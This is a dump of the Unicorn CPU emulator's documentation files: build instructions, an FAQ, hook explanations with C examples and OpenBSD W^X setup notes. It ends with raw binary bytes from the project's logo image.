mkdir build; cd build
cmake .. -DCMAKE_TOOLCHAIN_FILE=../mingw64-w64.cmake
make
```

## Native build on Windows host, with MSYS2/Mingw

This builds Unicorn2 on a **Windows host**, using the **MSYS2/Mingw** compiler.

This requires MSYS2 to be installed on the Windows machine. You need to download & install MSYS2 from https://www.msys2.org.

Then, from the MSYS2 console, install the packages below:

```bash
pacman -S mingw-w64-x86_64-toolchain mingw-w64-x86_64-cmake mingw-w64-x86_64-ninja
```

- Build Unicorn and samples with the following commands.

```bash
export PATH=/mingw64/bin:$PATH
mkdir build; cd build
/mingw64/bin/cmake .. -G "Ninja"
ninja -C .
```

Note that the way to build on MSYS changes as time goes by; always use the cmake shipped with mingw64.

## Cross build from Linux host to other architectures

This cross-builds Unicorn2 from a **Linux host** to other architectures, using a cross compiler.

- Install the cross compiler package. For example, cross-compiling to ARM requires the command below.

```bash
sudo apt install gcc-arm-linux-gnueabihf
```

- Build Unicorn and samples with the following commands. The compiler name differs according to your target.

```bash
mkdir build; cd build
cmake .. -DCMAKE_C_COMPILER=arm-linux-gnueabihf-gcc
make
```

## Building from vcpkg

The Unicorn port in vcpkg is kept up to date by Microsoft team members and community contributors. The url of vcpkg is: https://github.com/Microsoft/vcpkg. You can download and install unicorn using the vcpkg dependency manager:

```bash
git clone https://github.com/Microsoft/vcpkg.git
cd vcpkg
./bootstrap-vcpkg.sh # ./bootstrap-vcpkg.bat for Windows
./vcpkg integrate install
./vcpkg install unicorn
```

If the version is out of date, please [create an issue or pull request](https://github.com/Microsoft/vcpkg) on the vcpkg repository.
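## Verifying an installed build

To sanity-check an installed build, a minimal program such as the sketch below can be compiled against the library. It assumes `make install` has been run and that `pkg-config` can locate unicorn; adjust the compile command to your setup.

```c
/* sanity_check.c -- a minimal sketch to verify an installed build.
 * Build (assuming pkg-config can find unicorn after installation):
 *   gcc sanity_check.c $(pkg-config --cflags --libs unicorn)
 */
#include <stdio.h>
#include <unicorn/unicorn.h>

int main(void)
{
    unsigned int major, minor;
    uc_engine *uc;
    uc_err err;

    /* Query the library version we actually linked against. */
    uc_version(&major, &minor);
    printf("Unicorn version: %u.%u\n", major, minor);

    /* Opening and closing an engine exercises the core setup path. */
    err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc);
    if (err != UC_ERR_OK) {
        printf("uc_open() failed: %s\n", uc_strerror(err));
        return 1;
    }
    uc_close(uc);
    printf("uc_open()/uc_close() OK\n");
    return 0;
}
```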
unicorn-2.1.1/docs/FAQ.md

## Why is my execution so slow?

Typically, it's due to

- Instrumenting every instruction executed.
- Instrumenting every memory access.

Optimize your program with less instrumentation, e.g. by using `UC_HOOK_BLOCK` instead of `UC_HOOK_CODE`.

## Why do I get a wrong PC after emulation stops?

Updating the PC is a very large overhead for emulation (10x slower in the worst case, see the FAQ above), so the PC sync guarantee is explained below for several cases:

- A `UC_HOOK_CODE` hook is installed. In this case, the PC is sync-ed _everywhere_ within the effective range of the hook. However, on some architectures, the PC might be sync-ed all the time if the hook is installed in any range. Note that using `count` in `uc_emu_start` implies installing a `UC_HOOK_CODE` hook.
- A `UC_HOOK_MEM_READ` or `UC_HOOK_MEM_WRITE` hook is installed. In this case, the PC is sync-ed exactly before any read/write event within the effective range of the hook.
- Emulation (`uc_emu_start`) terminates without any exception. In this case, the PC will point to the next instruction.
- No hook mentioned above is installed and emulation terminates with an exception. In this case, the PC is sync-ed at the basic block boundary, in other words, at the first instruction of the basic block where the exception happens.

Below is an example:

```
mov x0, #1 <--- the PC will be here
mov x1, #2
ldr x0, [x1] <--- exception here
```

If `ldr x0, [x1]` fails with a memory exception, the PC will be left at the beginning of the basic block, in this case `mov x0, #1`. However, if a `UC_HOOK_MEM_READ` hook is installed, the PC will be sync-ed:

```
mov x0, #1
mov x1, #2
ldr x0, [x1] <--- exception here and PC sync-ed here
```

## I get an "Unhandled CPU Exception", why?

Unicorn is a pure CPU emulator, so usually this is due to no handler being registered for instructions like `syscall` and `SVC`. If you expect system emulation, you probably would like the [qiling framework](https://github.com/qilingframework/qiling).

## I would like to instrument a specific instruction but get a `UC_ERR_HOOK`, why?

Currently, only a small subset of the instructions can be instrumented. On x86, all available instructions are: `in` `out` `syscall` `sysenter` `cpuid`.
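For instance, instrumenting the x86 `syscall` instruction with `UC_HOOK_INSN` looks roughly like the sketch below. The code address, the emulated bytes and the register values are only illustrative:

```c
#include <stdio.h>
#include <inttypes.h>
#include <unicorn/unicorn.h>

#define ADDRESS 0x1000000 /* illustrative code address */

/* The UC_HOOK_INSN callback for `syscall` carries no extra arguments. */
static void hook_syscall(uc_engine *uc, void *user_data)
{
    uint64_t rax;
    uc_reg_read(uc, UC_X86_REG_RAX, &rax);
    printf(">>> syscall hit, rax = 0x%" PRIx64 "\n", rax);
}

int main(void)
{
    const uint8_t code[] = {0x0f, 0x05}; /* syscall */
    uint64_t rax = 0x100;
    uc_engine *uc;
    uc_hook trace;

    uc_open(UC_ARCH_X86, UC_MODE_64, &uc);
    uc_mem_map(uc, ADDRESS, 4096, UC_PROT_ALL);
    uc_mem_write(uc, ADDRESS, code, sizeof(code));
    uc_reg_write(uc, UC_X86_REG_RAX, &rax);

    /* The trailing variadic argument selects the instruction; a begin
       address greater than the end address (1, 0) means "any address". */
    uc_hook_add(uc, &trace, UC_HOOK_INSN, hook_syscall, NULL, 1, 0,
                UC_X86_INS_SYSCALL);

    uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(code), 0, 0);
    uc_close(uc);
    return 0;
}
```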
## Emulating some instructions gives an error like "Invalid Instruction", what should I do?

1. Some instructions are not enabled by default on some architectures. For example, you have to set up the CSRs on RISC-V or the VFP on ARM before emulating floating-point instructions. Refer to the corresponding manual to check if you left out possible switches in special registers.
2. Different CPU models support different sets of instructions. This is especially observed on ARM CPUs. For example, for `THUMB2` big-endian instructions, consider setting the CPU model to `cortex-r5` or `arm_max`. See [#1725](https://github.com/unicorn-engine/unicorn/issues/1725) and [#1724](https://github.com/unicorn-engine/unicorn/issues/1724).
3. If you are on ARM, please check whether you are emulating a THUMB instruction. If so, please use `UC_MODE_THUMB` and make sure the starting address is odd.
4. If it's none of the cases above, it might be some newer instruction set that qemu5 doesn't support.
5. Note that some instruction sets are not implemented by the latest QEMU.

If you are still using Unicorn1, please upgrade to Unicorn2 for better support.

## Memory hooks get called multiple times for a single instruction

There are several possibilities, e.g.:

- The instruction might access memory multiple times, like `rep stos` in x86.
- The address being accessed is badly aligned, so the MMU emulation will split the access into several aligned memory accesses. In the worst case on some architectures, this leads to byte-by-byte access.

## I can't recover from unmapped read/write even if I return `true` in the hook, why?

This is a minor change in memory hook behavior between Unicorn1 and Unicorn2. To gracefully recover from a memory read/write error, you have to map the invalid memory before you return true. This is due to the fact that, if users return `true` without the memory mapping set up correctly, we don't know what to do next. In Unicorn1, the behavior is __undefined__ in this case, but in Unicorn2 we would like to force users to set up the memory mapping in the hook to continue execution. See the [sample](https://github.com/unicorn-engine/unicorn/blob/c05fbb7e63aed0b60fc2888e08beceb17bce8ac4/samples/sample_x86.c#L1379-L1393) for details.
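A minimal sketch of that pattern is shown below: the hook maps the missing page before returning `true`, so the faulting access can be retried. The addresses and the 4 KiB page size are illustrative:

```c
#include <stdio.h>
#include <unicorn/unicorn.h>

#define CODE_ADDR 0x1000000

static bool hook_mem_unmapped(uc_engine *uc, uc_mem_type type,
                              uint64_t address, int size, int64_t value,
                              void *user_data)
{
    /* Map the missing page first: returning true alone is not enough in
       Unicorn2; the mapping must exist before execution resumes. */
    uint64_t aligned = address & ~0xfffULL;
    if (uc_mem_map(uc, aligned, 0x1000, UC_PROT_ALL) != UC_ERR_OK)
        return false;            /* abort emulation */
    printf("mapped 0x%llx on demand\n", (unsigned long long)aligned);
    return true;                 /* retry the faulting access */
}

int main(void)
{
    /* mov eax, [0x2000000] -- 0x2000000 is intentionally left unmapped */
    const uint8_t code[] = {0xa1, 0x00, 0x00, 0x00, 0x02};
    uc_engine *uc;
    uc_hook hh;

    uc_open(UC_ARCH_X86, UC_MODE_32, &uc);
    uc_mem_map(uc, CODE_ADDR, 4096, UC_PROT_ALL);
    uc_mem_write(uc, CODE_ADDR, code, sizeof(code));
    uc_hook_add(uc, &hh,
                UC_HOOK_MEM_READ_UNMAPPED | UC_HOOK_MEM_WRITE_UNMAPPED,
                hook_mem_unmapped, NULL, 1, 0);

    uc_err err = uc_emu_start(uc, CODE_ADDR, CODE_ADDR + sizeof(code), 0, 0);
    printf("emulation result: %s\n", uc_strerror(err));
    uc_close(uc);
    return 0;
}
```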
## My emulation gets weird read/write errors and CPU exceptions.

For MIPS, you might have an address that falls in the MIPS `kseg` segments. In that case, the MMU is bypassed and you have to make sure the corresponding physical memory is mapped. See [#217](https://github.com/unicorn-engine/unicorn/issues/217), [#1371](https://github.com/unicorn-engine/unicorn/issues/1371), [#1550](https://github.com/unicorn-engine/unicorn/issues/1550).

For ARM, you might have an address that falls in a non-executable segment. For example, for M-class ARM CPUs, some memory areas are not executable according to [the ARM document](https://developer.arm.com/documentation/ddi0403/d/System-Level-Architecture/System-Address-Map/The-system-address-map?lang=en).

## KeyboardInterrupt is not raised during `uc.emu_start`

This is intended, as the python [signal module](https://docs.python.org/3.10/library/signal.html) states:

> A long-running calculation implemented purely in C (such as regular expression matching on a large body of text) may run uninterrupted for an arbitrary amount of time, regardless of any signals received. The Python signal handlers will be called when the calculation finishes.

A workaround is to start emulation in another thread.

## Editing an instruction doesn't take effect/Hooks added during emulation are not called.

Unicorn is a fork of QEMU and inherits most QEMU internal mechanisms, one of which is called TB chaining. In short, every block (in most cases, a `basic block`) is translated, executed and __cached__. Therefore, any operation on cached addresses won't immediately take effect without a call to `uc_ctl_remove_cache`. Check a more detailed discussion here: [#1561](https://github.com/unicorn-engine/unicorn/issues/1561)

Note that this doesn't mean you have to care about self-modifying code, because there the read/write happens within emulation (TB execution) and QEMU handles such special cases. For technical details, refer to the [QEMU paper](https://www.usenix.org/legacy/event/usenix05/tech/freenix/full_papers/bellard/bellard.pdf).

TLDR: To ensure any modification to an address takes effect:

1. Call `uc_ctl_remove_cache` on the target address.
2. Call `uc_reg_write` to write the current PC to the PC register, if the modification happens during emulation. This restarts emulation (but doesn't quit `uc_emu_start`) at the current address to re-translate the block.

## How to emulate interrupts (or ticks) with Unicorn?

As stated, Unicorn is a pure CPU emulator. For such emulation, you have two choices:

- Use the `timeout` parameter of `uc_emu_start`
- Use the `count` parameter of `uc_emu_start`

After emulation stops, you may check anything you are interested in and resume emulation accordingly.

Note that for the cortex-m `exec_return`, Unicorn has a magic software exception with interrupt number 8. You may register a hook to handle that.

## Why not keep up with upstream qemu?

To provide end users with a simple API, Unicorn does lots of dirty hacks within the qemu code, which prevents it from syncing painlessly.

## Is there any way to disable softmmu to speed up execution?

Yes, it's possible, but that is not Unicorn's goal and there is no simple switch in qemu to disable softmmu. Starting from 2.0.2, Unicorn will emulate the MMU depending on the emulated architecture, without further hacks. That said, Unicorn offers the full ability of the target MMU implementation. While this enables more possibilities for Unicorn, it has a few drawbacks:

- As the previous question points out already, some memory regions are not writable/executable.
- You always have to check architecture-specific registers to confirm the MMU status.
- `uc_mem_map` will always deal with physical addresses, while `uc_emu_start` accepts virtual addresses.

Therefore, if you still prefer the previous `paddr = vaddr` simple mapping, we have a simple experimental MMU implementation that can be switched on by: `uc_ctl_tlb_mode(uc, UC_TLB_VIRTUAL)`. With this mode, you can also add a `UC_HOOK_TLB_FILL` hook to manage the TLB. When a virtual address is not cached, the hook will be called. Besides, users are allowed to flush the tlb with `uc_ctl_flush_tlb`. In theory, `UC_TLB_VIRTUAL` will achieve better performance as it skips all MMU details, though this has not been benchmarked.
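As a sketch, switching an opened engine to this mode uses exactly the two calls named above (the `use_virtual_tlb` helper is hypothetical):

```c
#include <unicorn/unicorn.h>

/* A sketch: opt in to the flat vaddr == paddr TLB on an opened engine. */
static void use_virtual_tlb(uc_engine *uc)
{
    /* Bypass the target architecture's MMU; addresses passed to
       uc_mem_map() are then used directly as virtual addresses. */
    uc_ctl_tlb_mode(uc, UC_TLB_VIRTUAL);

    /* ... map memory, optionally add a UC_HOOK_TLB_FILL hook, emulate ... */

    /* Drop cached translations whenever the layout changes. */
    uc_ctl_flush_tlb(uc);
}
```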
## Something is wrong - I would like to dig deeper

Unicorn uses the qemu logging implementation in several places. This might provide a first glance at what could be wrong. The logs optionally contain the filename and the line number, along with additional messages indicating what is happening. However, the qemu logs are partially commented-out and incomplete, but give it a try. You might want to dig deeper - and add your own log messages where you expect, or try, to find the bug.

To enable logs, you must recompile Unicorn with `-DUNICORN_LOGGING=yes` passed to cmake. Logs are written at different log levels, which might result in very verbose logging if enabled.

To control the log level information, two environment variables can be used: `UNICORN_LOG_LEVEL` and `UNICORN_LOG_DETAIL_LEVEL`. These environment variables are parsed into `uint32_t` values once (for performance reasons), so set them before you execute any line of Unicorn. Allowed are hexadecimal, decimal and octal values which fit into a buffer of 10 chars (see `strtoul` for details).

To define how detailed and what should be logged, use the following environment variables:

- `UNICORN_LOG_LEVEL`=\<32bit mask\>
  - The qemu bit mask of what should be logged.
  - Use the value of `UINT32_MAX` to log everything.
  - If no bit is set in the mask, there will be no logging.
- `UNICORN_LOG_DETAIL_LEVEL`=\<level\>
  - The level defines how the filename and line are constructed.
    - 0: no filename and no line is used.
    - 1: the full filename including the leading path is used, with line information.
    - 2: just the filename with line information. This might be a little confusing, as the same file name can occur in several places.
  - If unsure or unwanted, leave this variable undefined or set it to 0.

As an example of how to set up the environment correctly for python, see the example below.

```python
import os

os.environ['UNICORN_LOG_LEVEL'] = "0xFFFFFFFF" # verbose - print anything
os.environ['UNICORN_LOG_DETAIL_LEVEL'] = "1"   # full filename with line info
```

Please note that file names are statically compiled in and can reveal the paths of the file system used during compilation.

## My code does not do what I would expect - is this a bug?

Please create a GitHub issue and provide as many details as possible.

- [ ] Simplified version of your script / source
  - Make sure that "no" external dependencies are needed, e.g. remove additional use of capstone or CTF tools.
- [ ] Used Unicorn git-hash commit
  - Make sure to exclude any changes you made in unicorn. Alternatively, provide the repo link to your commit.
- [ ] Detailed explanation of what is expected
  - Try to verify whether the instructions can be processed by qemu. Dumping the registers of unicorn and qemu helps a lot.
- [ ] Detailed explanation of what is observed
  - Describe what's going on (and what you might think about it).
- [ ] Output from your executed script
  - You might have additional log messages which could be helpful.
- [ ] Output from the qemu logs
  - Try to gather more information by enabling the qemu logging.
- [ ] More details
  - Attach more details to help reproduce the bug, like a repo link to the CTF challenge containing the binary or source code.

## I'd like to make contributions, where do I start?

See [milestones](https://github.com/unicorn-engine/unicorn/milestones) and the [coding convention](https://github.com/unicorn-engine/unicorn/wiki/Coding-Convention).

Be sure to send pull requests for our **dev** branch only.

## Which qemu version is Unicorn based on?

Prior to 2.0.0, Unicorn was based on qemu 2.2.1. After that, Unicorn is based on qemu 5.0.1.
unicorn-2.1.1/docs/Hooks.md

## Introduction

In general, all the hooks can be bound to a region of the emulated memory, so that they will only fire when that region is reached (or accessed). The hooks are also stored in a list, so the more hooks you add, the more processing the system needs to dispatch them. This can slow your emulation down if you have a lot of hooks present.

Some hooks can return a value which, if non-0, will abort execution.

## UC_HOOK_BLOCK

*What is it?*

Let's first deal with the `UC_HOOK_BLOCK` case. These hooks are called whenever code execution starts within a 'basic block' in the emulated code. A 'basic block' is a sequence of instructions without any conditional branch or special processing instructions (or other events like the end of mapped memory) - a sequence that can be entirely emulated in (effectively) a linear path. The UC_HOOK_BLOCK hook is called with the address of the start of the block that's being executed and the size of that block (in bytes).

Because the block hooks are only called on entry to a section of code which must be executed, you can guarantee the execution passes through all the instructions in the block. If some instructions are conditional, the effect of the instruction might be null - e.g. `ADDEQ r0, r0, r1` in ARM is a conditional add that only happens if the Z flag is set. The basic block might contain any number of these conditional instructions, as the execution still passes through the instructions.

*Why might you use it?*

If you want a gross understanding of the code path, knowing where the system executed, you might use a block hook. Your hook might write diagnostics about where the code was at that time and the state of the registers. This would give you a very clear picture of how the execution was passing through the system. Loops, for example, might result in the same block hook being fired repeatedly, as the code passes through the same code, ending in the conditional jump back to the start of the loop. If you were disassembling the code, you could perform the disassembly on each block for its entire range, rather than using a code hook.
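As a sketch, a block hook and its registration might look like the following in C. The `trace_blocks` helper is hypothetical, and the `1, 0` range means the hook covers every address:

```c
#include <stdio.h>
#include <inttypes.h>
#include <unicorn/unicorn.h>

/* Called once on entry to each basic block, before the block body runs. */
static void hook_block(uc_engine *uc, uint64_t address, uint32_t size,
                       void *user_data)
{
    printf(">>> block at 0x%" PRIx64 ", size = 0x%x\n", address, size);
}

/* A sketch: register the hook for all addresses (begin=1 > end=0). */
static void trace_blocks(uc_engine *uc, uc_hook *hh)
{
    uc_hook_add(uc, hh, UC_HOOK_BLOCK, hook_block, NULL, 1, 0);
}
```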
## UC_HOOK_CODE

*What is it?*

The `UC_HOOK_CODE` hook is more fine-grained than `UC_HOOK_BLOCK`. It fires on every instruction that is executed, before it is executed. So whilst `UC_HOOK_BLOCK` is "I'm about to run this section of code", `UC_HOOK_CODE` is "I'm about to run this instruction". Having a lot of code hooks means that your hook will be called a lot. The hook is called (like the block hook) with the address of the code being executed, and its size. The size will only ever cover one instruction, however.

*Why might you use it?*

If you want to breakpoint the code at a particular place, this hook is a perfect way to do that. Calling `uc_emu_stop` will cause the emulation to stop at this point. You might also use it to trace the execution with a disassembly, in a similar way to the block hooks above. Because you're executing at the instruction level, this means that you can read the registers as they are before the code is executed, which may be useful for your disassembly. If you want to inject behaviour, you might use this hook to modify the registers - including modifying the program counter, to jump to a different place.

## UC_HOOK_MEM_READ, UC_HOOK_MEM_WRITE, UC_HOOK_MEM_READ_AFTER

*What is it?*

The `UC_HOOK_MEM_READ` and `UC_HOOK_MEM_WRITE` hooks are called whilst the emulator is executing instructions. When the code being emulated tries to read or write memory within the range, the hooks will be called.

For `UC_HOOK_MEM_READ`, the hook is called with the address that is being read and the size of the access. A 'value' is passed, but this operation occurs before the value has been read, so its content is indeterminate.

For `UC_HOOK_MEM_WRITE`, the hook is called with the address that is being written, the size of the access and the value that was written to it.

For `UC_HOOK_MEM_READ_AFTER`, the hook is called *after* the read has occurred. It is the same as `UC_HOOK_MEM_READ` except that the value has been populated.

These hooks are not used if you directly access the memory using the Unicorn `mem_*` functions.

*Why might you use it?*

If you were providing watchpoints that track accesses to memory, you might use any of these 3 hooks. You could report all the registers and the program counter at the time of access - even reporting a stack backtrace if you knew the calling standard.

You might use the `UC_HOOK_MEM_READ` and `UC_HOOK_MEM_WRITE` operations to fake memory-mapped IO. If you had a memory-mapped device that you wanted to expose to the system, you could use a `UC_HOOK_MEM_READ` hook to write a suitable value into memory for the memory-mapped register being accessed. The execution of the instruction would then pick up the new value that you had written. Similarly, the `UC_HOOK_MEM_WRITE` hook could update your internal state with the register that had been written at that address.

You might implement memory protection in a different manner than the standard Unicorn form. For example, you might check the processor mode and decide whether the memory is actually accessible or not to the code that is performing that access. This isn't usually an operation of the CPU (although some CPUs and MMUs do have this ability), but for diagnosing whether a given section of code should be *able* to access other memory this could be useful.
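A sketch of that memory-mapped IO idea is below. The device page address, the register value and the `attach_mmio_hooks` helper are hypothetical, and the page at `MMIO_BASE` is assumed to be mapped already:

```c
#include <stdio.h>
#include <inttypes.h>
#include <unicorn/unicorn.h>

#define MMIO_BASE 0x40000000ULL /* hypothetical device register page */

/* Runs before the load: a value written here is what the guest reads. */
static void hook_mmio_read(uc_engine *uc, uc_mem_type type, uint64_t address,
                           int size, int64_t value, void *user_data)
{
    uint32_t reg = 0xdeadbeef; /* hypothetical device status register */
    uc_mem_write(uc, address, &reg, sizeof(reg));
}

/* For writes, `value` holds what the guest just stored. */
static void hook_mmio_write(uc_engine *uc, uc_mem_type type, uint64_t address,
                            int size, int64_t value, void *user_data)
{
    printf("device write: [0x%" PRIx64 "] <- 0x%" PRIx64 " (%d bytes)\n",
           address, (uint64_t)value, size);
}

/* A sketch: hook only the (already mapped) device page. */
static void attach_mmio_hooks(uc_engine *uc, uc_hook *rd, uc_hook *wr)
{
    uc_hook_add(uc, rd, UC_HOOK_MEM_READ, hook_mmio_read, NULL,
                MMIO_BASE, MMIO_BASE + 0xfff);
    uc_hook_add(uc, wr, UC_HOOK_MEM_WRITE, hook_mmio_write, NULL,
                MMIO_BASE, MMIO_BASE + 0xfff);
}
```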
## UC_HOOK_MEM_FETCH

*What is it?*

The `UC_HOOK_MEM_FETCH` hook is not used.

*Why might you use it?*

You wouldn't. It's deprecated and will never be called.

## UC_HOOK_MEM_READ_UNMAPPED, UC_HOOK_MEM_WRITE_UNMAPPED, UC_HOOK_MEM_FETCH_UNMAPPED

*What is it?*

All 3 of these hooks are called when there is an access to a region for which there is no memory mapping.

The `UC_HOOK_MEM_READ_UNMAPPED` hook is called when the code tries to read from an unmapped memory region.

The `UC_HOOK_MEM_WRITE_UNMAPPED` hook is called when the code tries to write to an unmapped memory region.

The `UC_HOOK_MEM_FETCH_UNMAPPED` hook is called when the emulator needs to read an unmapped memory region to fetch code to execute.

In all cases, you can either map the page in with the `uc_mem_map*` functions or return non-0 to abort execution.

*Why might you use it?*

You might use these for dynamic memory mapping, only mapping in the memory when it is needed - which could be useful for a virtual-memory type system. You might use them for trapping bad accesses at the time that they happen (although the usual abort that you would get will also give you this information).

## UC_HOOK_MEM_READ_PROT, UC_HOOK_MEM_WRITE_PROT, UC_HOOK_MEM_FETCH_PROT

*What is it?*

All 3 of these hooks are called when there is an access to a region for which there is a memory mapping, but the memory was mapped with one of the `UC_PROT_*` restrictions.

The `UC_HOOK_MEM_READ_PROT` hook is called when the code tries to read a region that isn't allowed to be read.

The `UC_HOOK_MEM_WRITE_PROT` hook is called when the code tries to write to a region that isn't allowed to be written.

The `UC_HOOK_MEM_FETCH_PROT` hook is called when the emulator needs to read an instruction from a region that isn't allowed to execute.

In all cases, you can either change the region's permissions with the `uc_mem_protect` function or return non-0 to abort execution.

*Why might you use it?*

You might change the protection level of the region to allow the memory to be accessed, or you might return non-0 to abort execution.
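As a sketch, a write-protection hook that lifts the restriction and resumes might look like this; the 4 KiB page size and the helper name are illustrative:

```c
#include <unicorn/unicorn.h>

/* A sketch: lift the write restriction on the faulting page and resume. */
static bool hook_write_prot(uc_engine *uc, uc_mem_type type, uint64_t address,
                            int size, int64_t value, void *user_data)
{
    uint64_t page = address & ~0xfffULL; /* assumes 4 KiB pages */

    if (uc_mem_protect(uc, page, 0x1000, UC_PROT_ALL) != UC_ERR_OK)
        return false; /* abort emulation */
    return true;      /* retry the write */
}

/* Registration over all addresses; uc is an opened engine. */
static void allow_writes_on_fault(uc_engine *uc, uc_hook *hh)
{
    uc_hook_add(uc, hh, UC_HOOK_MEM_WRITE_PROT, hook_write_prot, NULL, 1, 0);
}
```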
unicorn-2.1.1/docs/OPENBSD-NOTES.md

## Circumventing OpenBSD 6.0's W^X Protections

OpenBSD 6.0 and above enforces data-execution prevention (DEP or W^X) by default, preventing memory from being mapped as simultaneously writeable and executable (i.e., W|X). This causes problems for Unicorn if left in place. If you're seeing errors like the following:

```
/home/git/unicorn >> ./sample_arm
Emulate ARM code
zsh: abort (core dumped)  ./sample_arm
```

then W^X is likely the culprit. If we run it again with ktrace and look at the output with kdump, we see that this is indeed the issue:

```
82192 sample_arm CALL  mmap(0,0x800000,0x7<PROT_READ|PROT_WRITE|PROT_EXEC>,0x1002<MAP_PRIVATE|MAP_ANON>,-1,0)
82192 sample_arm PSIG  SIGABRT SIG_DFL
82192 sample_arm NAMI  "sample_arm.core"
```

Right now, we're in the /home filesystem. Let's look at its mount options in /etc/fstab:

```
1234abcdcafef00d.g /home ffs rw,nodev,nosuid 1 2
```

If we edit the options to include `wxallowed`, appending this after nosuid, for example, then we're golden:

```
1234abcdcafef00d.g /home ffs rw,nodev,nosuid,wxallowed 1 2
```

Note that this *does* diminish the security of your filesystem somewhat, and so if you're particularly particular about such things, we recommend setting up a dedicated filesystem for any activities that require `W|X`, such as unicorn development and testing.

In order for these changes to take effect, you will need to reboot.

_Time passes..._

Let's try this again. There's no need to recompile unicorn or the samples, as W^X is strictly a runtime issue.

First, we double-check to see if /home has been mounted with wxallowed:

```
/home >> mount | grep home
/dev/sd3g on /home type ffs (local, nodev, nosuid, wxallowed)
```

Okay, now let's try running that sample again...

```
/home/git/unicorn/samples >> ./sample_arm
Emulate ARM code
>>> Tracing basic block at 0x10000, block size = 0x8
>>> Tracing instruction at 0x10000, instruction size = 0x4
>>> Emulation done. Below is the CPU context
>>> R0 = 0x37
>>> R1 = 0x3456
==========================
Emulate THUMB code
>>> Tracing basic block at 0x10000, block size = 0x2
>>> Tracing instruction at 0x10000, instruction size = 0x2
>>> Emulation done. Below is the CPU context
>>> SP = 0x1228
```

works fine.

unicorn-2.1.1/docs/README.md

Documentation of the Unicorn engine.

* How to compile & install Unicorn.
  http://unicorn-engine.org/docs/

* Tutorial on programming with the C & Python languages.
  http://unicorn-engine.org/docs/tutorial.html

* Compare Unicorn & QEMU
  http://unicorn-engine.org/docs/beyond_qemu.html

* Unicorn-Engine Documentation
  https://github.com/kabeor/Unicorn-Engine-Documentation

unicorn-2.1.1/docs/Unicorn_Engine_Documentation/

unicorn-2.1.1/docs/unicorn-logo-text.png (binary PNG image; data omitted)
unicorn-2.1.1/docs/unicorn-logo.png (binary PNG image; data omitted)
1\[d�(H&DG")A)-؝=,Y„΍U�Y: 1UFulw ѠL0q@@3A+cRބTM)Q0nq RaBxח^GKBl_/)1| ,,0yHO�jbԥkBk#w0>I3xv ]L|E"D5w(~v'v.o'AgKFrXsy כӁ8MX6Qۧɻc SD3Y˵3aD) ;d;UN1U`Br#||is9Mahb:x,ᣛV?n (rzwRNl ЪR\80 IF.&\FN 7hbq\~8`"�E?"o0x}"�W9:2 ˕ǽQy8䄟 (e85fsͫ(|dF=P,GLD 7ߡɲ 67( !U A0]Ҝᥡ$؛~Hu hMɪ �hxf>'xUsXB5 6oA}em ᏓҺ"aӔ'4"A~v)BGYjC/%N]ɰ|BPo揠K胉HDD]  8"*&1xHjm FߪFn].UF9</QFx~Qsijʽ@9ɏ -kRG+#+2>)oϔ+aipȉH~` ʨӃp,I7+8+YhR1(9?k^Xt:k^ݑ|(Y֨^Ό.|1N釧{9Uh D,Ipo%lEW+6f46mYFxf  rT9/HMT4{J{EA Ǽ"Y4frqϾb*/)g=8uN<pυ} s7sr^|p*Y(ȫ{gwY65q>4:r9?rzi"˿ҐO?H jnfPn#7^'^zY+efD?4R,VB;lw,M/ho@_PZI^EnAk_Ss{8H-' @ċ`4aruJY[?CN~ "ۿ9h<jcӜ8U؝Xu F#p%&RLRU(8"' r{rd굜8gwnO=ڵxAFb|M(vo:ncc"c 0svPCN>px[>FK(Ovˤy¿zi]=mJu|ACH?WU(4�J8&`ԓȥ0 E_S$AyK8X_4~h} ih"M:FCQhs̋c?'\6 h<T:?(ibZh#uCڄm6yȣc)^&yy\0An邴Y3x1N u.Z OƋ4ߚ؟|d_q 1NK޲!UeIpu2L=yt#xa]a a L.4Cr*GF*$X8 0UdL7GƋ a86/.]@NKa U}>;Uk)hIHZA΃*"3_[ #lyJ|EDyCF$ò`-GzXB6 2'F.ΌKho4"m3HZy&{a9C=<-fQ6o3@0͋i~H"٠r" hA)s/-f$'$/$tA%/I'oHlY T ΣNmd Ʀ< 7cCb;53 n }Hxщ Ty06+y<bՁ;5Eh\a15mK`lܐl {'?x, :QR}4ıNĒg:ha'0t"[@ƚ06:l {*f@?g=xH(2  b ,0ڶ"99&S,xp ݷ&$8-@ᣏCg2wc9q?�>=2a9ۃ)mn$6g5TaHpY'%%<)a' ۰!H4^rcd~// r^y F[&yxdŕu`<x?ɡv¾/O'lz8ݿrS \r [ڜ'Ե3/)v [V[706ji<b;`]fQvG<9xt  &,dڵ>)C)z|{0Q@P.\-󚜚^/oGXBI*& i±p)Ⱥwu=bDV}.()C@BUg$Ľ+_Oa!F&)ΚKn&c3f 囘/mk` j: ߑ'eI2W/cΣD ]زp8LSϠhR)GZLCGVn7,=nE<~@ qO ;ې7j,|Cg0*&6gԅ@ gQV'Bq֋p"Nuj:%䗉~A'kG&t&y Graa*^& ğw>&b)C<jlw ]r2/J;Ewa+ѻg/ &Nru(:ش Rk`rHF{¶r\#Y=QGIҲ<�)Ǫk$�DuفW [+Vw7̃U"1s#9"PT֗"ed/K(naTwBNY|S窵p<;հ*oG<N0Ԯ Kް:+GsMu^v R陵4|3rֈZ7w*QyQ*Nۄm (5r"aD< rm*'F :L5EHtI -/;)l~agoHAgj-|qP9Zz>3ץr|.l]@ʂ 6'G v+1p~ r}Fa2ƳTsx)؁qPy>{.k R^ϿԎF$^VWoR5 HE*%a]KQHы+d E0e8SHMaK u`Rh2aECxo-|yyГүȿuME e#};nR:Y-^ v U&ɵ w1w\~߇KJdGR]ڬ0;@bkx]ax)؁h=  (ZLHJc!"] m.8E;hugR TNjh0kӇp,YO?A׫AVp(Q⒃ uOu@?$|# ҴPdR %o7@a! "̿X6\.0j+6ڲ?xHH�J |=/ݻ_ntpb5& iE \͉;` BEH(E//etD~E-E5MH#M0Ԯŋ:a<ȊHi+qamRTBڋ7lo3'@g2r$R =gcsx5Hh涭 "PXNWx)؁D T_527\Ϸl!PhWv&ap>iȪ9C3ajxnk;*&l6�Jau$83ޟw>$/ RCUO q3̗>%(<؁D9{o>%7m;]3 cbfR^!9Yot^3gn!V &@bS<?ݳI5,rf 99|Eχ0*%KNs`j& %fG@~X"l^v  ? ԡ'_}'©)IlbѨRd7E0䑔fMΨ+Z$8%Y^&H<@lTçqxS]۾ Pcڍ3!NJ,d75?cL0P�7_K[(1 4F4Ac sR'. 
unicorn-2.1.1/docs/unicorn-logo.svg
<?xml version="1.0" encoding="UTF-8"?>
